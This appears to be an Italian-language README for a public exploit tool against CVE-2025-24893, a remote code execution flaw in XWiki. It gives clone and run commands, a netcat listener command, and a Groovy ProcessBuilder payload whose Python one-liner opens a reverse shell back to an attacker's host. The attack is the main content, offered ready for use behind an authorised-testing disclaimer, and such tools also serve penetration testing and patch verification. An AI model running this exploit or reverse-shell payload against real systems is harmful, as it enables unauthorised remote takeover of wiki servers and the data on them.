
Exploit modificato per CVE-2025-24893
Un semplice script Python3 per sfruttare CVE-2025-24893, una vulnerabilità di esecuzione remota di codice nella piattaforma XWiki, utilizzando una macro asincrona basata su Groovy e un payload di reverse shell configurabile.
⚠️ ATTENZIONE: Questo strumento è fornito esclusivamente per scopi educativi e di test autorizzati. L'uso non autorizzato contro sistemi di cui non si possiede la proprietà o per i quali non si dispone di un'autorizzazione esplicita è illegale e non etico.
ProcessBuilder per evitare le stranezze di Runtime.execrequestspip install requests
Clona questo repository:
git clone https://github.com/hackersonsteroids/cve-2025-24893.git
cd cve-2025-24893
./exploit.py <TARGET_DOMAIN> <LHOST> <LPORT>
<TARGET_DOMAIN>
L'host XWiki (ad es. wiki.example.local).
<LHOST>
L'IP della tua macchina attaccante (dove è in esecuzione il tuo listener).
<LPORT>
La porta del tuo listener (numero intero).
nc -lvnp 4444
./exploit.py wiki.vulnerable.local 10.0.0.5 4444
netcat per ottenere una shell.Prima di inviare il payload, lo script:
https://<TARGET_DOMAIN>http://<TARGET_DOMAIN> se HTTPS fallisceQuesto aiuta a garantire la compatibilità con distribuzioni a protocollo misto.
Per impostazione predefinita, lo script utilizza un one-liner Python3:
new ProcessBuilder(
['/bin/bash','-c',
'python3 -c \'import socket,subprocess,os;'
's=socket.socket();s.connect(("LHOST",LPORT));'
'os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);'
'os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])\'']
).redirectErrorStream(true).start()
build_payload() se hai bisogno di una shell diversa (ad es. Bash, Perl, PHP, ecc.).Questo progetto è concesso in licenza sotto la Licenza MIT. Consulta il file LICENSE per i dettagli.
Questo strumento è progettato esclusivamente per valutazioni di sicurezza autorizzate e scopi educativi. Gli autori non si assumono alcuna responsabilità per un uso improprio. Ottieni sempre un'autorizzazione esplicita prima di testare qualsiasi sistema target.